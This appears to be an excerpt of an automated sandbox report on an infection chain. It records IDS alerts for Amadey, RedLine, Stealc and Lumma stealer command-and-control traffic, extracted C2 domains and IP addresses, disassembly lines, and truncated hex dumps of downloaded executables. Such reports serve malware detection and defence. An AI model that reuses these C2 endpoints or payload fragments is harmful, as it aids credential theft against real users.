Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_0050AF10
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 16_2_0050AF10
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_004E6F20
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then xor eax, eax 16_2_004CEFFC
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp+00000120h] 16_2_004CEFFC
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 16_2_004DCFF0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49602 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.6:49602
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49604 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49607 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49610 -> 65.21.18.51:45580
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:49610 -> 65.21.18.51:45580
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 65.21.18.51:45580 -> 192.168.2.6:49610
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49611 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49614 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.17:80 -> 192.168.2.6:49613
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.17:80 -> 192.168.2.6:49613
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 65.21.18.51:45580 -> 192.168.2.6:49610
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49616 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49617 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49622 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 185.215.113.117:80 -> 192.168.2.6:49623
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49624 -> 89.105.223.196:29862
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:49624 -> 89.105.223.196:29862
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.105.223.196:29862 -> 192.168.2.6:49624
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49626 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49630 -> 185.215.113.67:15206
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:49630 -> 185.215.113.67:15206
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.215.113.67:15206 -> 192.168.2.6:49630
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49629 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 89.105.223.196:29862 -> 192.168.2.6:49624
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49632 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49633 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.215.113.67:15206 -> 192.168.2.6:49630
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 91.202.233.158:80 -> 192.168.2.6:49631
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 91.202.233.158:80 -> 192.168.2.6:49631
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.6:62485 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49636 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.6:49635 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.6:49638 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49640 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49645 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49643
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49643 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49648 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49681 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49723 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49726 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49635 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49635 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49638 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49638 -> 172.67.162.108:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor URLs: lootebarrkeyn.shop
Source: Malware configuration extractor URLs: gutterydhowi.shop
Source: Malware configuration extractor URLs: reinforcenh.shop
Source: Malware configuration extractor URLs: stogeneratmns.shop
Source: Malware configuration extractor URLs: vozmeatillu.shop
Source: Malware configuration extractor URLs: ghostreedmnu.shop
Source: Malware configuration extractor URLs: offensivedzvju.shop
Source: Malware configuration extractor URLs: fragnantbui.shop
Source: Malware configuration extractor URLs: drawzhotdog.shop
Source: Malware configuration extractor URLs: 188.190.10.161
Source: Malware configuration extractor URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor IPs: 185.215.113.16
Source: Malware configuration extractor URLs: 89.105.223.196:29862
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 185.215.113.67 ports 0,1,2,5,6,15206
Yara detected Generic Downloader
Source: Yara match File source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49606 -> 95.179.250.45:26212
Source: global traffic TCP traffic: 192.168.2.6:49610 -> 65.21.18.51:45580
Source: global traffic TCP traffic: 192.168.2.6:49624 -> 89.105.223.196:29862
Source: global traffic TCP traffic: 192.168.2.6:49630 -> 185.215.113.67:15206
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:06 GMTContent-Type: application/octet-streamContent-Length: 320000Last-Modified: Wed, 11 Sep 2024 19:08:04 GMTConnection: keep-aliveETag: "66e1ea94-4e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d7 04 00 00 20 00 00 00 d8 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 05 00 00 06 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f7 04 00 00 00 00 00 48 00 00 00 02 00 05 00 68 e8 04 00 70 0d 00 00 03 00 02 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 49 98 c5 eb e4 07 3d 4e 57 c4 94 0e b8 53 b5 28 8c a4 60 7d 43 e0 bd be a1 50 3f 32 96 e1 7f 68 ee 09 6c 85 3c 41 15 49 09 ba d4 fa f6 43 4e bc b8 ee c3 2f 99 75 8f 13 54 98 eb 94 d5 14 eb ae 0f 0f 40 0b 24 ba 30 ac ba 72 e4 aa c5 d3 22 5f 38 29 4c a5 93 97 73 a9 59 51 ec 11 25 fb 2f 3f dd c0 ca 4c 9f a3 37 65 26 5b d4 7a e2 92 dd eb bd c1 ae 2a 12 e3 6a 2e 9a 38 4a cb f5 ec b2 73 6e a8 3d e2 e0 4f dc a1 c9 e4 7c b2 90 d7 6e b7 f6 87 10 17 67 55 44 47 b4 ac 48 4b 1b 0e e4 87 e2 52 05 54 dc fa e9 31 4c 7a ca d5 dd 7f 0d 46 b5 7f 5e 6c ca b6 79 a8 7b 4a 80 90 42 7c 80 f8 ad 60 9f 6f 48 f3 8c 33 c5 fb 13 ac f3 56 4e d2 d8 66 94 7d 4a 06 87 f6 2f bf 3f 7f b6 89 bf dd e0 a0 b3 da b3 34 6e 45 85 53 86 a8 f1 e1 33 41 b1 d3 72 04 4d 9e 7f 71 66 e7 05 7b 8b 08 d6 a9 8b fd 21 49 55 07 c8 2f b1 4d 85 3f 3e f0 02 88 e8 08 a2 30 e7 65 94 96 58 16 66 e9 0b b0 69 09 55 69 17 02 ad cf a0 60 fc 77 be 88 66 61 b4 fe 4c 77 69 b7 56 4d a0 69 e1 34 ac d
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:09 GMTContent-Type: application/octet-streamContent-Length: 903168Last-Modified: Wed, 25 Sep 2024 19:30:48 GMTConnection: keep-aliveETag: "66f464e8-dc800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 64 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 be 0d 00 00 08 00 00 00 00 00 00 ee dc 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 dc 0d 00 57 00 00 00 00 e0 0d 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 5c db 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 0d 00 00 20 00 00 00 be 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 e0 0d 00 00 06 00 00 00 c0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 c6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 ca 0d 00 9c 10 00 00 03 00 02 00 13 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 6b ae d1 cd 28 d7 51 9d 2e cd 47 51 4c b3 ec 71 b5 82 95 83 cc 4e 71 72 d8 5c 9c 5e 76 e3 84 45 f8 df e1 e3 3c 8a 1c 40 3d ea aa d5 1c 29 21 62 e6 3d 71 51 2e ec b2 2e 42 0e 63 fc 1c 8c c6 ce 3c bf 71 b5 69 92 20 41 eb a1 b5 51 45 2c 54 ae 14 7e 66 cb 58 33 ec 89 ec 1e 81 df 7e f2 8f dd 9d 24 15 29 0a 28 38 74 07 ac a7 9b c4 e1 01 ec ed 72 e2 63 40 10 de 9e 13 69 a8 32 85 3f c4 2d 14 38 d1 fe 2d 09 84 e1 e8 c6 a0 3a 05 b1 ac 27 49 b2 60 44 f2 e6 aa d3 3f 2f 33 3f c5 1d d2 57 50 1f 27 db 02 c0 58 4c 7a 96 12 ce ef 62 12 7c 20 32 97 e1 d4 88 c4 2a 12 d6 86 ed 5c 0b 15 a6 11 1a d4 ad 8b 9d 42 19 0f a1 ed 48 67 24 33 70 df ad 7c 2b 73 fc b8 4b 8f b1 11 ee 5a cb 6d ba 60 fb f1 ce eb 77 7f 09 77 bd 69 f1 ba 56 74 06 0f 6e ef 4c 4c 0a db f7 64 0e 60 61 8e 4f 8b c8 54 c4 fc 9e ca 05 c8 c0 23 6b b5 30 44 40 64 9a fc 38 70 a4 7b 2e 3f 5a 0c d0 8e 2d c7 c8 5c 57 bf ea bf cf 2c a7 28 b6 c7 50 cc 17 26 60 4c 06 09 3f 5a ef c4 4a 2c 79 fd 3a a0 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:12 GMTContent-Type: application/x-msdos-programContent-Length: 425984Connection: keep-aliveLast-Modified: Sat, 24 Aug 2024 17:17:20 GMTETag: "68000-620711078a800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 3c 4c 00 00 e0 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 91 05 00 18 00 00 00 18 91 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 c8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0a e5 04 00 00 10 00 00 00 e6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 38 10 01 00 00 00 05 00 00 12 01 00 00 ea 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 20 06 00 00 34 00 00 00 fc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 4c 00 00 00 a0 06 00 00 4e 00 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:15 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
